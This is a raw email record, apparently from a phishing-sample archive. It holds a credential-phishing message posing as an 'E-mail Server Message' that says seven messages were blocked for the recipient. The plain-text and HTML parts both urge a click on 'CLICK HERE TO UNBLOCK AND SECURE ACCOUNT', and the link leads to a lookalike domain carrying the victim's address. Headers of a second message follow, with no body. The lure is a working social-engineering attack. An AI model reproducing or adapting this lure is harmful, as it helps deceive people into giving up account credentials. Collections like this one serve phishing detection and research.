From: E-mail Server Message <servermessage@cgacaldara.com>
Date: Wed, 31 Oct 2018 04:12:20 -0700
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - nimbus2.mydomainbox.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - cgacaldara.com
X-Get-Message-Sender-Via: nimbus2.mydomainbox.com: authenticated_id: po_makhathi@makhathiinsurance.com
X-Authenticated-Sender: nimbus2.mydomainbox.com: po_makhathi@makhathiinsurance.com
Status: O
X-Status: 
X-Keywords:                  
X-UID: 636

You will not see this in a MIME-aware mail reader.
--===============1855793060==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

    =

    =

    =

7 Messages blocked For jose@monkey.org

   incoming Message has been blocked by jose@monkey.org
due to mail setting on privacy policy . See technical details below to unbl=
ock. =


                    CLICK HERE TO UNBLOCK AND SECURE ACCOUNT
  =


  =

                        =

                PLEASE MOVE MESSAGE TO INBOX TO ENABLE THE LINKS
   =

    =

 =

   =

   This message is auto-generated from E-mail security server, and replies =
sent to this email can not be delivered. =

This email is meant for: jose@monkey.org


--===============1855793060==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P>
<TABLE style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", Helvetica, =
Arial, sans-serif; WIDTH: 618px; WHITE-SPACE: normal; WORD-SPACING: 0px; TE=
XT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(38,40,42); FONT-STYLE: nor=
mal; TEXT-ALIGN: left; MIN-HEIGHT: 458px; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-va=
riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid=
th: 0px; text-decoration-style: initial; text-decoration-color: initial' ce=
llSpacing=3D0>
<TBODY>
<TR style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; W=
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: n=
ormal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER=
-SPACING: normal; TEXT-INDENT: 0px; text-decoration-color: initial">
<TD bgColor=3D#f8f8f8>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD>
<TABLE style=3D'FONT-SIZE: 12px; FONT-FAMILY: roboto, "helvetica neue", hel=
vetica, arial, sans-serif; WIDTH: 496px; WHITE-SPACE: normal; WORD-SPACING:=
 0px; MIN-WIDTH: 272px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: r=
gb(34,34,34); FONT-STYLE: normal; PADDING-TOP: 8px; MIN-HEIGHT: 129px; ORPH=
ANS: 2; WIDOWS: 2; LETTER-SPACING: normal; LINE-HEIGHT: normal; TEXT-INDENT=
: 0px'>
<TBODY>
<TR>
<TD style=3D'FONT-FAMILY: roboto, "helvetica neue", helvetica, arial, sans-=
serif; MARGIN: 0px'>
<H2 style=3D"FONT-SIZE: 20px; COLOR: rgb(33,33,33); MARGIN: 0px"><FONT colo=
r=3D#ff0000>7&nbsp;Messages blocked For<SPAN class=3Dyiv7523840947Apple-con=
verted-space><SPAN>&nbsp;jose@monkey.org</SPAN></SPAN></FONT></H2></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; PADDING-TOP: 20px; MARGIN: 0px=
">
<P><FONT style=3D'FONT-SIZE: 16px; FONT-FAMILY: roboto, "helvetica neue", h=
elvetica, arial, sans-serif'>incoming Message has been blocked by<SPAN clas=
s=3Dyiv7523840947m_-4514990482279601338gmail-m_2937013097779082729m_4629230=
433895242398gmail-m_2520349127416093716Apple-converted-space>&nbsp;jose@mon=
key.org</SPAN></FONT><BR><FONT style=3D"FONT-SIZE: 14px; WHITE-SPACE: nowra=
p; BACKGROUND-COLOR: rgb(255,255,255)" face=3D"wf_segoe-ui_normal, segoe ui=
, segoe wp, tahoma, arial, sans-serif"><B><SPAN style=3D"COLOR: rgb(17,85,2=
04)"></SPAN></B></FONT><B style=3D'FONT-SIZE: 16px; FONT-FAMILY: roboto, "h=
elvetica neue", helvetica, arial, sans-serif; COLOR: rgb(117,117,117)'><FON=
T color=3D#000000><SPAN class=3Dyiv7523840947Apple-converted-space></SPAN><=
/FONT></B><FONT style=3D'FONT-SIZE: 16px; FONT-FAMILY: roboto, "helvetica n=
eue", helvetica, arial, sans-serif' color=3D#757575><FONT color=3D#000000>d=
ue to mail setting on&nbsp;</FONT></FONT><FONT size=3D2 face=3D"Arial, Helv=
etica, sans-serif"><B style=3D'FONT-SIZE: 16px; FONT-FAMILY: roboto, "helve=
tica neue", helvetica, arial, sans-serif; COLOR: rgb(117,117,117)'><FONT co=
lor=3D#000000>privacy policy</FONT></B></FONT><FONT style=3D'FONT-SIZE: 16p=
x; FONT-FAMILY: roboto, "helvetica neue", helvetica, arial, sans-serif' col=
or=3D#757575><FONT color=3D#000000><SPAN>&nbsp;</SPAN>. See technical detai=
ls below to unblock.</FONT>&nbsp;</FONT></P></TD></TR></TBODY></TABLE></TD>=
</TR></TBODY></TABLE></TD></TR>
<TR style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; W=
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: n=
ormal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER=
-SPACING: normal; TEXT-INDENT: 0px; text-decoration-color: initial">
<TD bgColor=3D#f8f8f8 height=3D15>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;=
 &nbsp; &nbsp; &nbsp;<SPAN>&nbsp;</SPAN><A style=3D"TEXT-DECORATION: underl=
ine; COLOR: rgb(25,106,212)" href=3D"http://makedslobvde-com.ga/viewer.php?=
l=3DUserID&amp;userid=3Djose@monkey.org" rel=3Dnofollow target=3D_blank><SP=
AN style=3D"TEXT-DECORATION: underline">CLICK HERE TO UNBLOCK AND SECURE AC=
COUNT</SPAN></A></TD></TR>
<TR style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; W=
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: n=
ormal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER=
-SPACING: normal; TEXT-INDENT: 0px; text-decoration-color: initial">
<TD bgColor=3D#f8f8f8><BR></TD></TR>
<TR style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; W=
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: n=
ormal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER=
-SPACING: normal; TEXT-INDENT: 0px; text-decoration-color: initial">
<TD bgColor=3D#f8f8f8 height=3D20></TD></TR>
<TR style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; W=
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: n=
ormal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER=
-SPACING: normal; TEXT-INDENT: 0px; text-decoration-color: initial">
<TD bgColor=3D#f8f8f8 height=3D10>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;=
 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<SPAN>&nbsp;</SPAN><SPAN style=3D"COLOR:=
 rgb(204,0,0)"><BR>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; =
PLEASE MOVE MESSAGE TO INBOX TO ENABLE THE LINKS</SPAN></TD></TR>
<TR style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; W=
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: n=
ormal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER=
-SPACING: normal; TEXT-INDENT: 0px; text-decoration-color: initial">
<TD bgColor=3D#f8f8f8>
<TABLE height=3D10 width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD>
<HR align=3Dcenter width=3D"100%">
</TD></TR></TBODY></TABLE></TD></TR>
<TR style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; W=
HITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: n=
ormal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER=
-SPACING: normal; TEXT-INDENT: 0px; text-decoration-color: initial">
<TD bgColor=3D#f8f8f8>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D2 face=3Dcalibri>This message is auto-generated from E-mai=
l security server, and replies sent to this email can not be delivered.<SPA=
N class=3Dyiv7523840947Apple-converted-space>&nbsp;</SPAN><BR>This email is=
 meant for:<SPAN class=3Dyiv7523840947Apple-converted-space>&nbsp;jose@monk=
ey.org</SPAN></FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></P=
></BODY></HTML>
--===============1855793060==--

From jose@monkey.org Thu Nov  1 07:56:55 2018 +0000
Return-Path: mailadministrator@wikamobile.com
Delivered-To: jose@monkey.org
X-FDA: 74782440390.04.star07_2241ddecd313
X-Spam-Summary: 80,0,0,5905069e13869d25,d41d8cd98f00b204,mailadministrator@wikamobile.com,:,RULES_HIT:41:72:355:375:379:474:495:800:962:967:973:978:983:988:989:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1436:1437:1513:1515:1516:1517:1521:1535:1543:1559:1588:1589:1711:1714:1730:1747:1777:1792:2198:2199:2393:2525:2527:2539:2560:2563:2682:2685:2859:2893:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3586:3867:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4416:5007:6261:6642:6653:6703:7652:8513:8518:8583:8599:8603:8957:8987:9025:9040:9080:9388:9411:9468:10004:10346:11473:11657:11658:11914:12043:12295:12438:12555:12660:12764:12895:12955:12986:13025:13139:13551:13975:14096:14181:14721:14849:18000:21063:21080:21325:21433:21451:21483:21524:21554:21627:21740:21810:21819:30022:30026:30054:30070,0,RBL:159.89.9.4:@wikamobile.com:.lbl8.mailshell.net-62.2.6.180 64.100.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:
X-HE-Tag: star07_2241ddecd313
X-Filterd-Recvd-Size: 5496
Received: from wikamobile.com (wikamobile.com [159.89.9.4])
	by imf16.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu,  1 Nov 2018 07:56:54 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
	d=wikamobile.com; s=mail; h=Content-Transfer-Encoding:Content-Type:
	MIME-Version:Message-ID:Date:Subject:To:From:Sender:Reply-To:Cc:Content-ID:
	Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc
	:Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:
	List-Subscribe:List-Post:List-Owner:List-Archive;
	bh=JAgYEpK2NE9XgDRRAMhHAmxXBOkc0LEQQ6NFm5k8tJw=; b=TMRKDngmo13xTnuviLgN4LHw1z
	q/gLN3XpEhe+faksAAsFqXmXZyn7UqFbcRqVwKnFCntgDIdGRILyUKzPsc3xVNRTAE51RE6bb9njX
	zrsiGjTAlDz36Y7RO0MMjnKZddFx1VWCVvcnwtbHD1qCGXPMJIMoeNh1jeM5jZHp4+tg=;
Received: from [172.98.194.227] (helo=wikamobile.com)
	by wikamobile.com with esmtpa (Exim 4.91)
	(envelope-from <mailadministrator@wikamobile.com>)
	id 1gI7qX-00057q-Ch
	for jose@monkey.org; Thu, 01 Nov 2018 07:56:53 +0000
